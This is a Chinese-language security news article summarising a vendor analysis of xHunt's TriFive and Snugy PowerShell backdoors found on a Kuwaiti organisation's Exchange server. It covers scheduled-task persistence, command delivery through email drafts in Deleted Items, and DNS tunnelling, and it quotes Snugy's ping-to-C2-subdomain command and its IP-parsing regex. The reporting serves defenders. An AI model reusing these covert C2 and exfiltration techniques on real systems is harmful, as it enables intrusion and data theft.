在调查科威特某组织的Microsoft Exchange服务器上的网络攻击时,专家发现了两个新的Powershell后门。
Palo Alto Networks的安全专家在调查科威特一家组织对Microsoft Exchange服务器的攻击时,发现了两个前所未有的Powershell后门。
专家将这次袭击归因于xHunt(又名Hive0081),该威胁于2018年首次被发现。该组织在过去已成为科威特政府的目标,他还对航运组织进行了攻击。
在最近的攻击中,攻击者使用了两个新发现的后门,分别跟踪为“ TriFive”和“ Snugy”,后者是先前发现的基于PowerShell的后门(跟踪为CASHY200)的变体。
“ TriFive和Snugy后门是PowerShell脚本,它们使用不同的命令和控制(C2)通道与参与者进行通信,从而提供对受感染的Exchange服务器的后门访问。TriFive后门使用基于电子邮件的渠道,该渠道使用Exchange Web Services(EWS)在受感染电子邮件帐户的Deleted Items文件夹内创建草稿。” 阅读专家发布的分析。“ Snugy后门使用DNS隧道通道在受感染的服务器上运行命令。我们将概述这两个后门,因为它们与活动中先前使用的工具不同。”
研究人员在科威特政府组织的受感染Exchange服务器上发现的后门样本中,使用秘密通道进行C2通信,包括DNS隧道和使用受感染电子邮件帐户的Deleted Items文件夹中的草稿的基于电子邮件的通道。
在发布该报告时,专家们尚未确定威胁参与者如何访问Exchange服务器。
袭击发生在9月,当时Palo Alto Networks被告知威胁行动者违反了科威特的一个组织。攻击者正在通过Internet信息服务(IIS)进程w3wp.exe向Exchange服务器发送可疑命令。
进一步的研究使研究人员能够发现攻击者创建的两个计划任务(在c:\ Windows \ System32 \ Tasks \ Microsoft \ Windows \ WDI文件夹中创建的“ ResolutionHosts”和“ ResolutionsHosts”),以实现持久性。这些任务是在收集日志的日期之前创建的,它们都将运行恶意的PowerShell脚本,这种情况表明攻击者可以在日志之前访问服务器。
“这两个任务执行的命令尝试运行splwow64.ps1和OfficeIntegrator.ps1,它们分别是我们称为TriFive的后门程序和我们称为Snugy的CASHY200的变体。” 继续分析。“脚本存储在系统上的两个单独的文件夹中,这可能是为了避免发现和删除两个后门。”
让我们深入分析两个后门。
TriFive后门程序通过计划的任务每五分钟执行一次,它通过登录到合法用户的收件箱并从已删除的电子邮件文件夹中的电子邮件草稿中获取PowerShell脚本,从而提供对Exchange服务器的后门访问。
TriFive示例使用了来自目标组织的合法帐户名和凭据,这意味着威胁参与者在部署后门程序之前已窃取了帐户凭据。
威胁参与者将登录到相同的合法电子邮件帐户,并创建主题为“ 555”的电子邮件草稿,其中包括加密和base64编码格式的命令。
通过将编码后的密文设置为电子邮件草稿的邮件正文,然后将电子邮件再次以“ 555s”为主题保存在“已删除邮件”文件夹中,后门会将命令结果发送回攻击者。
基于Snugy powerShell的后门使用DNS隧道通道在受感染的Exchange服务器上运行命令。
威胁参与者利用Snugy后门来获取系统信息,运行命令并从受感染的服务器中窃取数据。
“ Snugy变体使用以下命令对自定义的域进行ping操作,该域最终会尝试在将ICMP请求发送到解析IP地址之前解析该域:
cmd / c ping -n 1 <定制子域>。<C2域>
Snugy将使用以下正则表达式提取ping应用程序解析的IP地址,以从ping结果中收集IP地址:
\ b(?:( ?: 25 [0-5] | 2 [0-4] [0-9] | [01]?[0-9] [0-9]?)\。){3}( ?:25 [0-5] | 2 [0-4] [0-9] | [01]?[0-9] [0-9]?)\ b”
继续分析。
“基于子域中的渗透数据,我们能够确定参与者运行了ipconfig / all和dir。不幸的是,我们只有一部分请求,因此被窃取的数据被截断了,这也表明行动者可能执行了我们未观察到的其他命令。”
研究人员共享了危害指标(IoC),以允许管理员检查其环境是否受到威胁,xHunt活动仍在继续。
*编译:Domino
*来自:securityaffairs